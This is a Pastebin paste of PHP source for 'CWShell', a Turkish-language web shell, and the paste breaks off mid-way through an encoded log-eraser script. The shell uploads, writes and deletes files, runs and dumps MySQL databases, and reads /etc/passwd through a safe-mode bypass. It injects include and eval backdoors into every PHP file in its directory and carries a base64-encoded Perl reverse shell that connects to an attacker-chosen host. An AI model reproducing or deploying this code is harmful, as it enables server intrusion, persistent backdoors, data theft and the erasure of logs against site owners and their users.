fiftytwohartzwhale

Untitled

Oct 26th, 2021
176
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 41.05 KB | None | 0 0
  1. <?php
  2. $entry_line="c99php.com";
  3. $fp = fopen("index.htm", "w");
  4. fputs($fp, $entry_line);
  5. fclose($fp);
  6.  
  7. // Variables
  8.    $info = @$_SERVER['SERVER_SOFTWARE'];
  9.    $page = @$_SERVER['SCRIPT_NAME'];
  10.    $site = getenv("HTTP_HOST");
  11.    $uname = php_uname();
  12.    $smod = ini_get('safe_mode');
  13.            if ($smod == 0) { $safemode = "<font color='lightgreen'>KAPALI</font>"; }
  14.            else { $safemode = "<font color='red'>ACIK</font>";      }
  15.    $dir = @realpath($_POST['dir']);
  16.    $mkdir = @$_POST['makedir'];
  17.    $mydir = @$_POST['deletedir'];
  18.    $cmd = @$_GET['cmd'];
  19.    $host = @$_POST['host'];
  20.    $proto = @$_POST['protocol'];
  21.    $delete = @$_POST['delete'];
  22.    $phpeval = @$_POST['php_eval'];
  23.    $db = @$_POST['db'];
  24.    $query = @$_POST['query'];
  25.    $user = @$_POST['user'];
  26.    $pass = @$_POST['passd'];
  27.    $myports = array("21","22","23","25","59","80","113","135","445","1025","5000","5900","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018");
  28.    
  29.  
  30.    $quotes = get_magic_quotes_gpc();
  31. if ($quotes == "1" or $quotes == "on")
  32.    {
  33.        $quot = "<font color='red'>ACIK</font>";
  34.    }
  35.    else
  36.    {
  37.        $quot = "<font color='lightgreen'>KAPALI</font>";
  38.    }
  39.    // Perms
  40.     function getperms($fn)
  41. {
  42. $mode=fileperms($fn);
  43. $perms='';
  44. $perms .= ($mode & 00400) ? 'r' : '-';
  45. $perms .= ($mode & 00200) ? 'w' : '-';
  46. $perms .= ($mode & 00100) ? 'x' : '-';
  47. $perms .= ($mode & 00040) ? 'r' : '-';
  48. $perms .= ($mode & 00020) ? 'w' : '-';
  49. $perms .= ($mode & 00010) ? 'x' : '-';
  50. $perms .= ($mode & 00004) ? 'r' : '-';
  51. $perms .= ($mode & 00002) ? 'w' : '-';
  52. $perms .= ($mode & 00001) ? 'x' : '-';
  53. return $perms;
  54. }
  55.  // milw0rm Search (locushell)
  56.  
  57. $Lversion = @php_uname('r');
  58. $OSV = @php_uname('s');
  59. if(eregi('Linux',$OSV))
  60. {
  61. $Lversion=substr($Lversion,0,6);
  62. $millink="http://milw0rm.com/search.php?dong=Linux Kernel".$Lversion;
  63.  
  64. }else{
  65. $Lversion=substr($Lversion,0,3);
  66. $millink="http://milw0rm.com/search.php?dong=".$OSV." ".$Lversion;
  67. }
  68. if(isset($_POST['milw0'])) { echo "<script>window.location='".$millink."'</script>"; }
  69.    //Space
  70.    $spacedir = @getcwd();
  71.    $free = @diskfreespace($spacedir);
  72.    
  73. if (!$free) {$free = 0;}
  74.    $all = @disk_total_space($spacedir);
  75. if (!$all) {$all = 0;}
  76. function view_size($size)
  77. {
  78.  if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
  79.  elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
  80.  elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
  81.  else {$size = $size . " B";}
  82.  return $size;
  83. }
  84. $percentfree = intval(($free*100)/$all);
  85.  
  86.  
  87. // PHPinfo
  88. if(isset($_POST['phpinfo']))
  89. {
  90. die(phpinfo());
  91. }
  92.    
  93.  
  94. // Make File
  95.  
  96.    $name = htmlspecialchars(@$_POST['names']);
  97.    $src = @$_POST['source'];
  98.     if(isset($name) && isset($src))
  99.       {
  100.       if($_POST['darezz'] != realpath("."))  { $name = $_POST['darezz'].$name; }
  101.    $ctd = fopen($name,"w+");
  102.    fwrite($ctd, $src);
  103.    fclose($ctd);
  104.    echo "<script>alert('Uploaded')</script>";
  105.       }
  106.  
  107. // Upload File
  108.    $path = @$_FILES['ffile']['tmp_name'];
  109.    $name = @$_FILES['ffile']['name'];
  110.    if(isset($path) && isset($name))
  111. {  
  112. if($_POST['dare'] != realpath("."))  { $name = $_POST['dare'].$name; }
  113.    if(move_uploaded_file($path, $name))
  114.    {
  115.       echo "<script>alert('Uploaded')</script>";
  116.    }
  117.    else
  118.    {
  119.       echo "<script>alert('Error')</script>";
  120. }   }
  121.  
  122. // Delete File
  123.  
  124.    
  125.    if(isset($delete) && $delete != $dir)
  126. {
  127.       if(file_exists($delete))
  128.       {
  129.          unlink($delete);
  130.          echo "<script>alert('File Deleted')</script>";
  131.       }
  132.  
  133. }
  134.  
  135. // Database
  136.    
  137.    if(isset($db) && isset($query) && isset($_POST['godb']))
  138. {
  139.    $mysql = mysql_connect("localhost", $user, $pass)or die("<script>alert('Connection Failed')</script>");
  140.    $db = mysql_select_db($db)or die(mysql_error());
  141.    $queryz = mysql_query($query)or die(mysql_error());
  142. if($query) { echo "<script>alert('Done')</script>"; }
  143. else { echo "<script>alert('Error')</script>"; }
  144. }
  145.  
  146. // Dump Database [pacucci.com]
  147. if(isset($_POST['dump']) && isset($user) && isset($pass) && isset($db)){
  148. mysql_connect('localhost', $user, $pass);
  149. mysql_select_db($db);
  150. $tables = mysql_list_tables($db);
  151. while ($td = mysql_fetch_array($tables))
  152. {
  153. $table = $td[0];
  154. $r = mysql_query("SHOW CREATE TABLE `$table`");
  155. if ($r)
  156. {
  157. $insert_sql = "";
  158. $d = mysql_fetch_array($r);
  159. $d[1] .= ";";
  160. $SQL[] = str_replace("\n", "", $d[1]);
  161. $table_query = mysql_query("SELECT * FROM `$table`");
  162. $num_fields = mysql_num_fields($table_query);
  163. while ($fetch_row = mysql_fetch_array($table_query))
  164. {
  165. $insert_sql .= "INSERT INTO $table VALUES(";
  166. for ($n=1;$n<=$num_fields;$n++)
  167. {
  168. $m = $n - 1;
  169. $insert_sql .= "'".mysql_real_escape_string($fetch_row[$m])."', ";
  170. }
  171. $insert_sql = substr($insert_sql,0,-2);
  172. $insert_sql .= ");\n";
  173. }
  174. if ($insert_sql!= "")
  175. {
  176. $SQL[] = $insert_sql;
  177. }
  178. }
  179. }
  180. $dump = "-- Database: ".$_POST['db'] ." \n";
  181. $dump .= "-- CWShellDumper v3\n";
  182. $dump .= "-- c99php.com\n";
  183. $dumpp = $dump.implode("\r", $SQL);
  184. $name = $db."-".date("d-m-y")."cyberwarrior.sql";
  185. Header("Content-type: application/octet-stream");
  186. Header("Content-Disposition: attachment; filename = $name");
  187. echo $dumpp;
  188. die();
  189. }
  190.  
  191. // Make Dir
  192. if(isset($mkdir)) {
  193.  
  194. mkdir($mkdir);
  195. if($mkdir) { echo "<script>alert('Tamamdýr.')</script>"; } }
  196.  
  197. // Delete Directory
  198.  
  199. if(isset($mydir) && $mydir != "$dir") {
  200. $d = dir($mydir);
  201. while($entry = $d->read()) {
  202.  if ($entry !== "." && $entry !== "..") {
  203.  unlink($entry);
  204.  }
  205. }
  206. $d->close();
  207. rmdir($mydir);
  208.  
  209. }
  210.  
  211. //Infect Files [RFI]
  212.  
  213. if(isset($_POST['inf3ct']))
  214. {
  215. foreach (glob("*.php") as $lola)
  216. {
  217. $dira = '.';
  218. $asdi = fopen($lola, 'a+');
  219. @fwrite($asdi, '
  220. <?php
  221. include($_GET[\'pwn\']);
  222. ?>');
  223. @fclose($asdi);
  224. }
  225. if($asdi)
  226. {
  227. $textzz = '<font size=2 color=lightgreen>Oldu:<br> ?pwn=[shell]</font>';
  228. }
  229. else {
  230. $textzz = '<font size=2 color=red>HATA! (Permlere Dikkat Et..)</font>';
  231. }
  232. }
  233.  
  234. //Infect Files [Eval]
  235. if(isset($_POST['evalinfect']))
  236. {
  237. foreach (glob("*.php") as $lal)
  238. {
  239. $dira = '.';
  240. $axd = fopen($lal, 'a+');
  241. @fwrite($axd, '
  242. <?php
  243. eval(stripslashes($_GET[\'eval\']));
  244. ?>');
  245. @fclose($axd);
  246. }
  247. if($axd)
  248. {
  249. $textz0 = '<font size=2 color=lightgreen>Oldu:<br> ?eval=[eval]</font>';
  250. }
  251. else {
  252. $textz0 = '<font size=2 color=red>HATA! (Permler IZIn Vermior..)</font>';
  253. }
  254. }
  255.  
  256. // Images
  257.    if(@$_GET['com'] == "image")
  258.    {
  259.    $images = array(
  260.    "folder"=> "iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAABmJLR0QAAAAAAAD5Q7t/AAAACXBIWXMAAA3XAAAN1wFCKJt4AAAAB3RJTUUH1QsKEjkN+d1wUAAAAX9JREFUOMulkU2IUlEYhp9jKv5AposQWgRBtA6CmSCa5SzjYhG0qYggiP6Y3WxmtrMIol1QM84qRKRlSVC2bBcYRpuIIigFC7F7j0fP/WZx7QriBc2XDw6cw/e8L+9Rly6XtorF4jZTMsYE58Dc2tvdf0KE1J17t+X61RszH7X2eLb3lF6vd6VaqT2PBJSci7Q+taJMeNt4M331qFqpPQCIA6TTGY7k8pEA50IpcFMKpRS1F9X7QAAwxuB5Lq8/9ml2Msylww5nbjpSSOnPYYJmJ8PjjXW0sXMxUslD3H1YPxUH8DwXgJ+/NV/af+cCnDiaBSCmtSadnjP6DMVc1w0T/BfgXwdLARZNYK2PHgZlh7+QiPkIICIopRARRMAXwVphaH3MSBiMLEMr5LLJCcDzXI7nBnT7hh9dD0ThI4wHERAEkTEYGFmZAH512pw+e44PX/+MlwJ3EfARBAUiYaqVkwXqL1+R19/L6vy1nYabOLa2aHnZ4bf378qbqyyrA8KHtMqnsOL4AAAAAElFTkSuQmCC",
  261.    "file"=> "iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAABGdBTUEAAK/INwWK6QAAABl0RVh0U29mdHdhcmUAQWRvYmUgSW1hZ2VSZWFkeXHJZTwAAAP3SURBVHjaYtxx5BYDIwMUMDLESIjyTeRiZ2H4//8/WOgvEP/69Zfh5+9/DI8ev3jx9NGDKAYmpovc/MIMc6e0MwAEEAszEyPDP6h+pn9/ORWkBYV4OVlhRjL8Bprz5etfhncfPjP8l5IQ4uVh33Lt2i1foAUXQPIAAcSirC3F8PoXI8N7JmaGrw9f//z67S8DCzMrAwvjPwZWVkYGpv+MDIxAJzIB5VlZGBgsjTRlWFiYN99//BpsCEAAsbCxsTCwMjEx/P3NZPmcSTB2/UNmBsb//xi+fv3DoCH8l8FFlZmBg4WVgZ2dleHHr98Ml27cY/jPwCzDxc23BejLQIAAAEEAvv8CAwH/APT1/l/l7P+/IRwHREEtBQAmJgIA+g4GAKHUBgCGufQA9fb1AAgFAwASEAwA9ff+AOjr8QAFBgob/Pz9YQKI6ePP/7qH7zBP5GJhYtfjZ2KQAnqfCehUoIUMnFzMDBuv8TAsOPSeAWgk0GvMDNxc7AxCvOwM4sI8QJf8/wsQQCzbb/9L/vGLgd9KkoHh03cGhku/GBhefmVg+AjEQHFgxDAzrDr4ncFK/jkDDxcfMDwYGbi4OBhYgF4HBs1/gABiOnf9p/mrT78ZXv9hYHj3m4Hh8hMGhquPGBgevmRgeP+NgeHP5+8Mty98ZLj++D0DK/N/Bm4OdmDA/mDg52QDxztAADG9fPyDb/eRDwzTjvxmAJrBYAx0yV+gzfeBBvz68pfh64PXDOxcrAx//4Jih4mBDRgVPDxAlwDZoNgBCCCmPz//Pn15+iXDiyufGF5+ANnAwMD66yfDzcNPGIS/vWb4+uITAycvE1icmQUYlaysDF8/vwMGKhM4nQAEENOz84t2i4mJMHiYcDNI8DMyCAJdZi4FjB9LVgZ9VW4GEWleBgWJHwxSQEOYgdH5H5jsRETFGf4D0wUorQIEENODQ5MWq2h9uSUty8EgJcDAIMfOwOCpy8FQkibOoKbOy+AaKMbgYfiRQVxEDOhkFgZmYJp58fwJMGj/AkOAkQEggFh+fHj54uLq1PhTurMXPXqkpsr5+QMDDzczA5cML8OzN58YBN+dY7DSEGLgFxJl+AUMh3///jDIysgDww/kgv8MAAHEDPLH19ePnpzcsmzLzduvFT4zKGucOP+M4ffnZwyKrI8ZbDVEGBSUNYDqgRr+/WdgAtL37txgEAZ6Y9XKlacAAogFlmn+fnt3X+bv6e0L6tr8P757B4yJvwzcvIIMbBycDH+Bnv0NzI3ADMHw5+8/Bg1dYwYmNmB+YWXlAAggRE4GxsnUeev09+zalvDsySOgwYzgDA2y9T/Df3juBDFBPBYWNsbbN86fBAgwAD3nU17W2F2kAAAAAElFTkSuQmCC",
  262.    "floppy"=> "R0lGODlhECAQILMgIB8jVq2yyI0csGVuGcjL2v///9TY405WfqOmvjI+bHoaoQsMQxR+uubn7bu+0f///yH5BAEgIA8gLCAgICAQIBAgIAR/8CHEHlVq6HMZNEUYJGFZMiACFtxpCiBDHgLjEwogzLfZDAuBw0AsEn0eIAKocAR+E0Yls1koAn2skjLFDA7WQKlBJh6z4AEiVDZneDDFrNEwE95QRHwgaFOdSlx6CwcKdndOUQxxJgZgFgIYCjALCQN/eRUWIAsPIHggoSCdESA7"
  263.    );
  264. header("Content-type: image/gif");
  265. header("Cache-control: public");
  266. header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
  267. header("Cache-control: max-age=".(60*60*24*7));
  268. header("Last-Modified: ".date("r",filemtime(__FILE__)));
  269. $image = $images[$_GET['img']];
  270.  echo  base64_decode($image);
  271.  }
  272. //File List
  273.  
  274.    chdir($dir);
  275.    if(!isset($dir)) { $dir = @realpath("."); }
  276.     if($dir != "/") { $dir = @realpath("."); } else { $dir = "."; }
  277.    if (substr($dir,-1) != DIRECTORY_SEPARATOR) {$dir .= DIRECTORY_SEPARATOR;}
  278.    $pahtw = 0;
  279.    $filew = 0;
  280.    $num = 1;
  281.  
  282.    if (is_dir($dir))
  283.    {
  284.       if ($open = opendir($dir))
  285.       {
  286.       if(is_dir($dir)) {
  287.    $typezz = "DIR";
  288.    $pahtw++;
  289.  }
  290.          while (($list = readdir($open)) == true)
  291.          {
  292.          
  293.          if(is_dir($list)) {
  294.    $typezz = "DIR";
  295.    $pahtw++;
  296.    @$listf.= '<tr><td valign=top><img src=?com=image&img=folder><font size=2 face=Verdana>['.$list.']<td valign=top><font size=2 face=Verdana>'.$typezz.'</font></td><td valign=top></td><td valign=top><font size=2 face=Verdana>' . getperms($list) .'</font></td></tr>'; }
  297. else {
  298.  
  299.    $lolz = filesize($list) / 1024;
  300.    $lolx = intval($lolz);
  301.    if($lolx == 0) { $lolx = 1; }
  302.    $typezz = "DOSYA";
  303.    $filew++;
  304.    $listz = "/".$list;
  305.    if(eregi($page,$listz)) {    @$listf.= '<tr><td valign=top><img src=?com=image&img=file><font size=2 face=Verdana color=yellow>'.$list.'<td valign=top><font size=2 face=Verdana>'.$typezz.'</td><td valign=top width=15%><font size=2 face=Verdana>' . $lolx .' Kb</td><td valign=top><font size=2 face=Verdana>' . getperms($list) . '</font></tr>'; }
  306.    elseif(eregi('config',$listz) && eregi('.php',$listz)) { @$listf.= '<tr><td valign=top><img src=?com=image&img=file><font size=2 face=Verdana><b>'.$list.'</b><td valign=top><font size=2 face=Verdana>'.$typezz.'</td><td valign=top width=15%><font size=2 face=Verdana>' . $lolx .' Kb</td><td valign=top><font size=2 face=Verdana>' . getperms($list) . '</font></tr>'; }
  307.    else {@$listf.= '<tr><td valign=top><img src=?com=image&img=file><font size=2 face=Verdana>'.$list.'<td valign=top><font size=2 face=Verdana>'.$typezz.'</td><td valign=top width=15%><font size=2 face=Verdana>' . $lolx .' Kb</td><td valign=top><font size=2 face=Verdana>' . getperms($list) . '</font></tr>'; }  }
  308.    
  309.    }        
  310.    closedir($open);
  311.          
  312.       }
  313. $fileq = $pahtw + $filew;   }
  314.  
  315.  
  316.  
  317.  
  318. echo "<html>
  319. <head>
  320. <style>
  321. table.menu {
  322. border-width: 0px;
  323.   border-spacing: 1px;
  324.   border-style: solid;
  325.   border-color: #a6a6a6;
  326.   border-collapse: separate;
  327.   background-color: rgb(98, 97,97);
  328. }
  329. table.menuz {
  330. border-width: 0px;
  331.   border-spacing: 1px;
  332.   border-style: solid;
  333.   border-color: #a6a6a6;
  334.   border-collapse: separate;
  335.   background-color: rgb(98, 97,97);
  336. }
  337. table.menu td {
  338.   border-width: 1px;
  339.   padding: 1px;
  340.   border-style: none;
  341.   border-color: #333333;
  342.   background-color: #000000;
  343.   -moz-border-radius: 0px;
  344. }
  345. table.menuz tr {
  346.   border-width: 1px;
  347.   padding: 1px;
  348.   border-style: none;
  349.   border-color: #333333;
  350.   background-color: #000000;
  351.   -moz-border-radius: 0px;
  352. }
  353.  
  354. table.menuz tr:hover {
  355.     background-color: #111111;
  356. }
  357. input,textarea,select {
  358. font: normal 11px Verdana, Arial, Helvetica, sans-serif;
  359. background-color:black;
  360. color:#a6a6a6;
  361. border: solid 1px #363636;
  362. }
  363. </style>
  364.  
  365. </head>
  366. <body bgcolor='#000000' text='#ebebeb' link='#ebebeb' alink='#ebebeb' vlink='#ebebeb'>
  367. <table style='background-color:#333333; border-color:#a6a6a6' width=100% border=0 align=center cellpadding=0 cellspacing=0>
  368. <tr><td>
  369. <center><b><font size='6' face='Webdings'>ü</font>
  370. <font face='Verdana' size='5'><a href='".@$_SERVER['HTTP_REFERER']."'>~ CWShell ~</font></a>
  371. <font size='6' face='Webdings'>ü</font></b>
  372. </center>
  373. </td></tr></table><table class=menu width=100%<tr><td>
  374. <font size='1' face='Verdana'><b>Site:  </b><u>$site</u> <br>
  375. <b>Server Name: </b><u>" . $_SERVER['SERVER_NAME'] . "</u> <br>
  376. <b>Server Bilgisi : </b> <u>$info</u> <br>
  377. <b>Uname -a:</b> <u>$uname</u> <br>
  378. <b>Klasör:</b> <u>" . $_SERVER['DOCUMENT_ROOT'] . "</u> <br>
  379. <b>Safe Mode:</b>  <u>$safemode</u> <br>
  380. <b>Sihirli Sozler:</b> <u>$quot</u> <br>
  381. <b>Sayfa:</b> <u>$page</u><br>
  382. <b>Boþ Alan:</b> <u>" . view_size($free) . " [ $percentfree% ]</u> <br>
  383. <b>Toplam Alan:</b> <u>" . view_size($all) . "</u> <br>
  384. <b>IP:</b> <u>" . $_SERVER['REMOTE_ADDR'] ."</u> - Server IP:</b> <a href='http://whois.domaintools.com/". $_SERVER['SERVER_ADDR'] ."'>".$_SERVER['SERVER_ADDR']."</a></td></tr>
  385. <tr><td><form method='post' action=''>
  386. <center><input type=submit value='File List' name=filelist> - <input type=submit value='View PhpInfo' name=phpinfo> - <input type=submit value='Encoder' name='encoder'> - <input type='submit' value='Send Fake Mail' name='mail'> - <input type='submit' value='Cmd Execution' name='commex'> - <input type='submit' name='logeraser' value='Logs Eraser'> - <input type='submit' name='connectback' value='Connect Back'> - <input type='submit' name='safemodz' value='Safe Mode Bypass'> - <input type='submit' name='milw0' value='Milw0rm Search'></center></td></tr>";
  387. // Safe Mode Bypass
  388. if(isset($_POST['safemodz']))
  389. {
  390. echo "<tr><td valign=top width=50%>
  391. <center><b><font size='2' face='Verdana'>Safe-Mode Bypass[Dosyalar]<br></font></b>
  392. <form action='' method='post'>
  393.      <font size='1' face='Verdana'>Dosya adý:</font><br> <input type='text' name='filew' value='/etc/passwd'> <input type='submit' value='Dosyayý Oku' name='redfi'><br>
  394.       </td><tr>
  395. <td valign=top>
  396. <center><b><font size='2' face='Verdana'>Safe-Mode Bypass [Klasörler]<br></font></b>
  397.   <form method='post' action=''>
  398.   <font size='1' face='Verdana'>Klasör:</font><br>
  399.   <input type='text' name='directory'> <input type='submit' value='Listele' name='reddi'>";
  400.   }
  401.    // Safe Mode Bypass: File
  402. if(isset($_POST['redfi']))
  403. {
  404.     $test='';
  405.     $tempp= tempnam($test, "cx");
  406.     $get = htmlspecialchars($_POST['filew']);
  407.     if(copy("compress.zlib://".$get, $tempp)){
  408.     $fopenzo = fopen($tempp, "r");
  409.     $freadz = fread($fopenzo, filesize($tempp));
  410.     fclose($fopenzo);
  411.     $source = htmlspecialchars($freadz);
  412.     echo "<tr><td><center><font size='1' face='Verdana'>$get</font><br><textarea rows='20' cols='80' name='source'>$source</textarea>";
  413.     unlink($tempp);
  414.     } else {
  415.     echo "<tr><td><center><font size='1' color='red' face='Verdana'>HATA</font>";
  416.             }
  417.    
  418. }
  419.  
  420. // Safe Mode Bypass: Directory
  421.  if(isset($_POST['reddi'])){
  422.    
  423. function dirz()
  424. {
  425. $dirz = $_POST['directory'];
  426. $files = glob("$dirz*");
  427.  
  428. foreach ($files as $filename) {
  429.     echo "<tr><td><font size='1' face='Verdana'>";
  430.    echo "$filename\n";
  431.    echo "</font><br>";
  432. }
  433. }
  434. echo "<br>"; dirz();
  435. }
  436.  
  437. // Connect Back
  438. if(isset($_POST['connectback']))
  439. {
  440. echo "
  441. <tr><td>
  442. <center><font size='2' face='Verdana'><b>Back-Connect</b><br></font>
  443. <form method='post' action=''><input type='text' name='connhost' size='15'value='target'> <input type='text' name='connport' size='5' value='port'> <input type='submit' name='connsub' value='Run'></form>";
  444. }
  445. if(isset($_POST['logeraser']))
  446. {
  447. echo "<tr><td>
  448. <center><b><font size='2' face='Verdana'>:: OS ::<br></font></b>
  449.        <select name=functionp>
  450.          <option>linux</option>
  451.          <option>sunos</option>
  452.          <option>aix</option>
  453.          <option>irix</option>
  454.          <option>openbsd</option>
  455.           <option>solaris</option>
  456.           <option>suse</option>
  457.           <option>lampp</option>
  458.           <option>debian</option>
  459.           <option>freebsd</option>
  460.           <option>misc</option>
  461.        </select><br><input type='submit' name='runer' value='Erase'></table>";
  462.         }
  463.        
  464. // Connect Back
  465. if(isset($_POST['connsub']))
  466. {
  467. $sources = base64_decode("CiMhL3Vzci9iaW4vcGVybAp1c2UgU29ja2V0OwoKJGV4ZWN1dGU9J2VjaG8gIkhlcmUgaSBhbSI7ZWNobyAiYHVuYW1lIC1hYCI7ZWNobyAiYHVwdGltZWAiOy9iaW4vc2gnOwoKJHRhcmdldD0kQVJHVlswXTsKJHBvcnQ9JEFSR1ZbMV07CiRpYWRkcj1pbmV0X2F0b24oJHRhcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOwokcGFkZHI9c29ja2FkZHJfaW4oJHBvcnQsICRpYWRkcikgfHwgZGllKCJFcnJvcjogJCFcbiIpOwokcHJvdG89Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOwpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7CmNvbm5lY3QoU09DS0VULCAkcGFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsKb3BlbihTVERJTiwgIj4mU09DS0VUIik7Cm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsKb3BlbihTVERFUlIsICI+JlNPQ0tFVCIpOwpzeXN0ZW0oJGV4ZWN1dGUpOwpjbG9zZShTVERJTik7CmNsb3NlKFNURE9VVCk7IA==");
  468. $openz = fopen("cbs.pl", "w+")or die("Error");
  469. fwrite($openz, $sources)or die("Error");
  470. fclose($openz);
  471. $aids = passthru("perl cbs.pl ".$_POST['connhost']." ".$_POST['connport']);
  472. unlink("cbs.pl");
  473. }
  474. if(isset($_POST['connsub'])) { echo "<tr><td><font color='lightgreen' face='Verdana' size='2'>Done.</font>"; }
  475.  
  476.         // Logs Eraser
  477. if(isset($_POST['runer']))
  478. {
  479. echo "<tr><td><center><textarea cols='30' rows='2'>";
  480. $erase = base64_decode("IyF1c3IvYmluL3BlcmwNCiMgQ1dTSGVsbA0KICAgICAgIGNob21wKCRvcyA9ICRBUkdWWzBdKTsNCg0KICAgICAgICAgICAgICAgIGlmKCRvcyBlcSBcIm1pc2NcIil7ICNJZiBtaXNjIHR5cGVkLCBkbyB0aGUgZm9sbG93aW5nIGFuZCBzdGFydCBicmFja2V0cw0KICAgICAgICAgICAgIHByaW50IFwiWytdbWlzYyBTZWxlY3RlZC4uLlxcblwiOyAgIA0KICAgICAgICAgICAgIHNsZWVwIDE7DQogICAgICAgICAgICAgcHJpbnQgXCI8dHI+WytdTG9ncyBMb2NhdGVkLi4uXFxuXCI7DQogICAgICAgICAgICAgc2xlZXAgMTsNCiAgICAgICAgICAgICAkYSA9IHVubGluayBAbWlzYzsgICANCiAgICAgICAgICAgICBzbGVlcCAxOw0KCQkJIA0KICAgICAgICAgICAgaWYoJGEpIHsgcHJpbnQgXCJbK11Mb2dzIFN1Y2Nlc3NmdWxseSBEZWxldGVkLi4uXFxuXCI7IH0NCgkJCWVsc2UgeyBwcmludCBcIlstXUVycm9yXCI7IH0NCiAgICAgICAgICAgICAgfQ0KDQogICAgICAgICAgICAgICAgaWYoJG9zIGVxIFwib3BlbmJzZFwiKXsgI0lmIG9wZW5ic2QgdHlwZWQsIGRvIHRoZSBmb2xsb3dpbmcgYW5kIHN0YXJ0IGJyYWNrZXRzDQogICAgICAgICAgICAgcHJpbnQgXCJbK11vcGVuYnNkIFNlbGVjdGVkLi4uXFxuXCI7DQogICAgICAgICAgICAgc2xlZXAgMTsNCiAgICAgICAgICAgICBwcmludCBcIlsrXUxvZ3MgTG9jYXRlZC4uLlxcblwiOyAgIA0KICAgICAgICAgICAgIHNsZWVwIDE7DQogICAgICAgICAgICAgJGIgPSB1bmxpbmsgQG9wZW5ic2Q7ICAgDQogICAgICAgICAgICAgc2xlZXAgMTsNCiAgICAgICAgICAgIGlmKCRiKSB7cHJpbnQgXCJbK11Mb2dzIFN1Y2Nlc3NmdWxseSBEZWxldGVkLi4uXFxuXCI7ICAgfQ0KCQkJZWxzZSB7IHByaW50IFwiWy1dRXJyb3JcIjsgfQ0KICAgICAgICAgICAgICB9DQoNCiAgICAgICAgICAgICAgICBpZigkb3MgZXEgXCJmcmVlYnNkXCIpeyAjSWYgZnJlZWJzZCB0eXBlZCwgZG8gdGhlIGZvbGxvd2luZyBhbmQgc3RhcnQgYnJhY2tldHMNCiAgICAgICAgICAgICBwcmludCBcIlsrXWZyZWVic2QgU2VsZWN0ZWQuLi5cXG5cIjsgICANCiAgICAgICAgICAgICBzbGVlcCAxOw0KICAgICAgICAgICAgIHByaW50IFwiWytdTG9ncyBMb2NhdGVkLi4uXFxuXCI7ICAgDQogICAgICAgICAgICAgc2xlZXAgMTsNCiAgICAgICAgICAgICAkYyA9IHVubGluayBAZnJlZWJzZDsgICANCiAgICAgICAgICAgICBzbGVlcCAxOw0KICAgICAgICAgICAgIGlmKCRjKSB7IHByaW50IFwiWytdTG9ncyBTdWNjZXNzZnVsbHkgRGVsZXRlZC4uLlxcblwiOyB9DQoJCQkgZWxzZSB7IHByaW50IFwiWy1dRXJyb3JcIjsgfQ0KICAgICAgICAgICAgICB9DQoNCiAgICAgICAgICAgICAgICBpZigkb3MgZXEgXCJkZWJpYW5cIil7ICNJZiBEZWJpYW4gdHlwZWQsIGRvIHRoZSBmb2xsb3dpbmcgYW5kIHN0YXJ0IGJyYWNrZXRzDQogICAgICAgICAgICAgcHJpbnQgXCJbK11kZWJpYW4gU2VsZWN0ZWQuLi5cXG5cIjsNCiAgICAgICAgICAgICBzbGVlcCAxOw0KICAgICAgICAgICAgIHByaW50IFwiWytdTG9ncyBMb2NhdGVkLi4uXFxuXCI7DQogICAgICAgICAgICAgc2xlZXAgMTsNCiAgICAgICAgICAgICAkZCA9IHVubGluayBAZGViaWFuOyAgIA0KICAgICAgICAgICAgIHNsZWVwIDE7DQogICAgICAgICAgICAgaWYoJGQpIHsgcHJpbnQgXCJbK11Mb2dzIFN1Y2Nlc3NmdWxseSBEZWxldGVkLi4uXFxuXCI7IH0NCgkJCSAgZWxzZSB7IHByaW50IFwiWy1dRXJyb3JcIjsgfQ0KICAgICAgICAgICAgICB9DQoNCiAgICAgICAgICAgICAgICBpZigkb3MgZXEgXCJzdXNlXCIpeyAjSWYgc3VzZSB0eXBlZCwgZG8gdGhlIGZvbGxvd2luZyBhbmQgc3RhcnQgYnJhY2tldHMNCiAgICAgICAgICAgICBwcmludCBcIlsrXXN1c2UgU2VsZWN0ZWQuLi5cXG5cIjsNCiAgICAgICAgICAgICBzbGVlcCAxOw0KICAgICAgICAgICAgIHByaW50IFwiWytdTG9ncyBMb2NhdGVkLi4uXFxuXCI7DQogICAgICAgICAgICAgc2xlZXAgMTsNCiAgICAgICAgICAgICAkZSA9IHVubGluayBAc3VzZTsgICANCiAgICAgICAgICAgICBzbGVlcCAxOw0KICAgICAgICAgICAgaWYoJGUpIHsgcHJpbnQgXCJbK11Mb2dzIFN1Y2Nlc3NmdWxseSBEZWxldGVkLi4uXFxuXCI7IH0NCgkJCSBlbHNlIHsgcHJpbnQgXCJbLV1FcnJvclwiOyB9DQogICAgICAgICAgICAgIH0NCg0KICAgICAgICAgICAgICAgIGlmKCRvcyBlcSBcInNvbGFyaXNcIil7ICNJZiBzb2xhcmlzIHR5cGVkLCBkbyB0aGUgZm9sbG93aW5nIGFuZCBzdGFydCBicmFja2V0cw0KICAgICAgICAgICAgIHByaW50IFwiWytdc29sYXJpcyBTZWxlY3RlZC4uLlxcblwiOw0KICAgICAgICAgICAgIHNsZWVwIDE7DQogICAgICAgICAgICAgcHJpbnQgXCJbK11Mb2dzIExvY2F0ZWQuLi5cXG5cIjsNCiAgICAgICAgICAgICBzbGVlcCAxOw0KICAgICAgICAgICAgICRmID0gdW5saW5rIEBzb2xhcmlzOw0KICAgICAgICAgICAgIHNsZWVwIDE7DQogICAgICAgICAgICAgaWYoJGYpIHtwcmludCBcIlsrXUxvZ3MgU3VjY2Vzc2Z1bGx5IERlbGV0ZWQuLi5cXG5cIjsgfQ0KCQkJIGVsc2UgeyBwcmludCBcIlstXUVycm9yXCI7IH0NCiAgICAgICAgICAgICAgfQ0KDQogICAgICAgICAgICAgICAgaWYoJG9zIGVxIFwibGFtcHBcIil7ICNJZiBsYW1wcCB0eXBlZCwgZG8